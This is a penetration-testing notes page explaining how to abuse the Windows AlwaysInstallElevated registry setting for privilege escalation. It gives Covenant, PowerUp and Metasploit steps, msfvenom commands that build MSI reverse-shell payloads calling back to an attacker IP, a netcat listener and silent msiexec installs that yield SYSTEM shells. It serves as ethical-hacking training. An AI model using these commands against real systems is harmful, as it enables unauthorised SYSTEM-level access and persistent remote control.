CSbyGB - Pentips
Buy me a tea
  • CS By GB - PenTips
    • Welcome to CSbyGB's Pentips
  • Networking, Protocols and Network pentest
    • Basics
    • DNS
    • FTP
    • HTTP & HTTPS
    • IMAP
    • IPMI
    • MSSQL
    • MYSQL
    • NFS
    • Oracle TNS
    • POP3
    • RDP
    • RPC
    • Rservices
    • Rsync
    • SMB
    • SMTP
    • SNMP
    • SSH
    • VOIP and related protocols
    • Winrm
    • WMI
    • Useful tips when you find unknown ports
  • Ethical Hacking - General Methodology
    • Introduction
    • Information Gathering
    • Scanning & Enumeration
    • Exploitation (basics)
    • Password Attacks
    • Post Exploitation
    • Lateral Movement
    • Proof-of-Concept
    • Post-Engagement
    • MITRE ATT&CK
  • External Pentest
    • External Pentest
  • Web Pentesting
    • Introduction to HTTP and web
    • Enumeration
    • OWASP Top 10
    • General Methodo & Misc Tips
    • Web Services and API
    • Vunerabilities and attacks
      • Clickjacking
      • CORS (Misconfigurations)
      • CSRF
      • SSRF
      • Bypass captcha
      • Template Injection (client and server side)
      • MFA bypass
      • XXE
    • Exposed git folder
    • Docker exploitation and Docker vulnerabilities
    • Websockets
  • Mobile App Pentest
    • Android
    • IOS
  • Wireless Pentest
    • Wireless pentest
  • Cloud Pentest
    • Cloud Pentest
    • Google Cloud Platform
    • AWS
  • Thick Client Pentest
    • Thick Client
  • Hardware Pentest
    • ATM
    • IoT
  • Secure Code Review
    • Secure code review
    • Java notes for Secure Code Review
  • AI & AI Pentest
    • MITRE ATLAS
    • OWASP ML and LLM
    • Hugging face
    • AI Python
    • Gemini
    • Ollama
  • Checklist
    • Web Application and API Pentest Checklist
    • Linux Privesc Checklist
    • Mobile App Pentest Checklist
  • Tools
    • Burpsuite
    • Android Studio
    • Frida
    • CrackMapExec
    • Netcat and alternatives
    • Nmap
    • Nuclei
    • Evil Winrm
    • Metasploit
    • Covenant
    • Mimikatz
    • Passwords, Hashes and wordlist tools
    • WFuzz
    • WPScan
    • Powershell Empire
    • Curl
    • Vulnerability Scanning tools
    • Payload Tools
    • Out of band Servers
    • STEWS
    • Webcrawlers
    • Websocat
  • VM and Labs
    • General tips
    • Setup your pentest lab
  • Linux
    • Initial Foothold
    • Useful commands and tools for pentest on Linux
    • Privilege Escalation
      • Kernel Exploits
      • Password and file permission
      • Sudo
      • SUID
      • Capabilities
      • Scheduled tasks
      • NFS Root Squashing
      • Services
      • PATH Abuse
      • Wildcard Abuse
      • Privileged groups
      • Exploit codes Cheat Sheet
  • Windows
    • Offensive windows
    • Enumeration and general Win tips
    • Privilege Escalation
    • Active Directory
    • Attacking Active Directory
      • LLMNR Poisoning
      • SMB Relay Attacks
      • Shell Access
      • IPv6 Attacks
      • Passback Attacks
      • Abusing ZeroLogon
    • Post-Compromise Enumeration
      • Powerview or SharpView (.NET equivalent)
      • AD Manual Enumeration
      • Bloodhound
      • Post Compromise Enumeration - Resources
    • Post Compromise Attacks
      • Pass the Password / Hash
      • Token Impersonation - Potato attacks
      • Kerberos
      • GPP/cPassword Attacks
      • URL File Attack
      • PrintNightmare
      • Printer Bug
      • AutoLogon exploitation
      • Always Installed Elevated exploitation
      • UAC Bypass
      • Abusing ACL
      • Unconstrained Delegation
    • Persistence
    • AV Evasion
    • Weaponization
    • Useful commands in Powershell, CMD and Sysinternals
    • Windows Internals
  • Programming
    • Python programming
    • My scripts
    • Kotlin
  • Binary Exploitation
    • Assembly
    • Buffer Overflow - Stack based - Winx86
    • Buffer Overflow - Stack based - Linux x86
  • OSINT
    • OSINT
    • Create an OSINT lab
    • Sock Puppets
    • Search engines
    • OSINT Images
    • OSINT Email
    • OSINT Password
    • OSINT Usernames
    • OSINT People
    • OSINT Social Media
    • OSINT Websites
    • OSINT Business
    • OSINT Wireless
    • OSINT Tools
    • Write an OSINT report
  • Pentester hardware toolbox
    • Flipper Zero
    • OMG cables
    • Rubber ducky
  • Post Exploitation
    • File transfers between target and attacking machine
    • Maintaining Access
    • Pivoting
    • Cleaning up
  • Reporting
    • How to report your findings
  • Red Team
    • Red Team
    • Defenses Enumeration
    • AV Evasion
  • Writeups
    • Hackthebox Tracks
      • Hackthebox - Introduction to Android Exploitation - Track
    • Hackthebox Writeups
      • Hackthebox - Academy
      • Hackthebox - Access
      • Hackthebox - Active
      • Hackthebox - Ambassador
      • Hackthebox - Arctic
      • Hackthebox - Awkward
      • Hackthebox - Backend
      • Hackthebox - BackendTwo
      • Hackthebox - Bastard
      • Hackthebox - Bastion
      • Hackthebox - Chatterbox
      • Hackthebox - Devel
      • Hackthebox - Driver
      • Hackthebox - Explore
      • Hackthebox - Forest
      • Hackthebox - Good games
      • Hackthebox - Grandpa
      • Hackthebox - Granny
      • Hackthebox - Inject
      • Hackthebox - Jeeves
      • Hackthebox - Jerry
      • Hackthebox - Lame
      • Hackthebox - Late
      • Hackthebox - Love
      • Hackthebox - Mentor
      • Hackthebox - MetaTwo
      • Hackthebox - Monteverde
      • Hackthebox - Nibbles
      • Hackthebox - Optimum
      • Hackthebox - Paper
      • Hackthebox - Photobomb
      • Hackthebox - Poison
      • Hackthebox - Precious
      • Hackthebox - Querier
      • Hackthebox - Resolute
      • Hackthebox - RouterSpace
      • Hackthebox - Sauna
      • Hackthebox - SecNotes
      • Hackthebox - Shoppy
      • Hackthebox - Soccer
      • Hackthebox - Steamcloud
      • Hackthebox - Toolbox
      • Hackthebox - Vault
      • Hackthebox - Updown
    • TryHackme Writeups
      • TryHackMe - Anonymous
      • TryHackMe - Blaster
      • TryHackMe - CMesS
      • TryHackMe - ConvertMyVideo
      • TryHackMe - Corridor
      • TryHackMe - LazyAdmin
      • TryHackMe - Looking Glass
      • TryHackMe - Nahamstore
      • TryHackMe - Overpass3
      • TryHackMe - OWASP Top 10 2021
      • TryHackMe - SimpleCTF
      • TryHackMe - SQL Injection Lab
      • TryHackMe - Sudo Security Bypass
      • TryHackMe - Tomghost
      • TryHackMe - Ultratech
      • TryHackMe - Vulnversity
      • TryHackMe - Wonderland
    • Vulnmachines Writeups
      • Web Labs Basic
      • Web Labs Intermediate
      • Cloud Labs
    • Mobile Hacking Lab
      • Mobile Hacking Lab - Lab - Config Editor
      • Mobile Hacking Lab - Lab - Strings
    • Portswigger Web Security Academy Writeups
      • PS - DomXSS
      • PS - Exploiting vulnerabilities in LLM APIs
    • OWASP projects and challenges writeups
      • OWASP MAS Crackmes
    • Vulnerable APIs
      • Vampi
      • Damn Vulnerable Web Service
      • Damn Vulnerable RESTaurant
    • Various Platforms
      • flAWS 1&2
  • Digital skills
    • How to make a gitbook
    • Marp
    • Linux Tips
    • Docker
    • VSCodium
    • Git Tips
    • Obsidian
  • Durable skills
    • Durable skills wheel/Roue des compétences durables
  • Projects
    • Projects
      • Technical Projects
      • General Projects
  • Talks
    • My Talks about Web Pentest
    • My talks about Android Application hacking
    • Other of my talks and Podcast
  • Resources
    • A list of random resources
Powered by GitBook
On this page
  • Target requirements
  • Enumerate with cmd
  • Exploitation
  • Covenant
  • Metasploit
  • Other way
  • Resources
  1. Windows
  2. Post Compromise Attacks

Always Installed Elevated exploitation

PreviousAutoLogon exploitationNextUAC Bypass

Last updated 3 years ago

Target requirements

  • The target needs to have those values in the registry:

    • In Computer\HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer with the AlwaysInstallElevated set to 1

    • In Computer\HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\Installer with the AlwaysInstallElevated set to 1 This means that installation packages are installed with elevated privileges

Enumerate with cmd

  • Type reg query HKLM\Software\Policies\Microsoft\Windows\Installer in a cmd prompt should be set to 1

  • Type reg query HKCU\Software\Policies\Microsoft\Windows\Installer should be one as well

Exploitation

  • You should have a shell with covenant, metasploit or netcat or an access to the target. We will use Covenant and Metasploit here.

Covenant

Enumerate with SharpUp audit

  • In your shell type SharpUp audit

  • In the results you should see this:

    === AlwaysInstallElevated Registry Keys ===
    
      HKLM:    1
      HKCU:    1

Enumerate with powerup

  • Click on execute

  • Type powershell invoke-allchecks in your shell

  • We should see this

    [*] Checking for AlwaysInstallElevated registry key...
    AbuseFunction : Write-UserAddMSI

Exploitation

  • generate a payload with msfvenom msfvenom -p windows/exec CMD="" -f msi -o exploitalwaysinstalled.msi between the quotes copy and paste an encoded launcher.

  • Upload your file in the target using Upload command from covenant (type Upload and enter, file the file path for the target and browse to the file in your attack machine)

  • run it using `shell msiexec /quiet /qn /i exploitalwaysinstalled.msi

  • We should get a prompt for another reverse shell in our grunts as an elevated user

    > whoami
    NT AUTHORITY\SYSTEM

Exploitation with powerup

  • powershell -ep bypass

  • . .\PowerUp.ps1

  • Write-UserAddMSI

  • It will set up a malicious MSI called UserAdd

Metasploit

  • Interact with a session you should already have from initial foothold sessions -i num-of-session

Enumerate

  • Launch run post/multi/recon/local_exploit_suggester

  • You should see: - exploit/windows/local/always_install_elevated: The target is vulnerable.

Exploitation

  • Background your session with ctrl z

  • Type use exploit/windows/local/always_install_elevated

  • set session to the number of the session you have on your target

  • type exploit -j

  • list the sessions you should have another one running as authority system

  • type ps and look for a process under session 1 so that we can migrate to it

  • We can use winlogon.exe 620 520 winlogon.exe x64 1 NT AUTHORITY\SYSTEM C:\Windows\System32\winlogon.exe

  • Migrate to it using migrate PID-number in our example it is going to be migrate 520

OR

  • msfconsole

  • use multi/handler

  • set payload windows/meterpreter/reverse_tcp

  • set lhost your-Kali-IP

  • run

  • In another console tab msfvenom -p windows/meterpreter/reverse_tcp lhost=Your-Kali-IP -f msi -o setup.msi

  • Get the generated msi in your target (python server -> browser from target)

  • In your target Place setup.msi in a folder where you have write access

  • Open command prompt and type: msiexec /quiet /qn /i C:\Folder\you\chose\setup.msi

Other way

  • Generate a malicious MSI package msfvenom -p windows/shell_reverse_tcp lhost=IP-OF-ATTACK-MACHINE lport=PORT -f msi > file.msi

  • Set up a listener rlwrap nc -lnvp CHOSEN-PORT

  • Upload it to the target and execute it from the cmd msiexec /i c:\users\user\desktop\file.msi /quiet /qn /norestart

  • You should get an elevated shell

Resources

In the shell we will type PowerShellImport, type enter and fetch PoweUp.ps1 (if you do not have it you can get it )

And we will be able to add a user

Our user has been added

You should get an elevated shell in msfconsole

here
Movement, Pivoting and Persistence for Pentesters and Ethical Hackers
TCM security Academy - Movement pivoting and persistence for pentesters and ethical hacker
Logo
image
image
image
image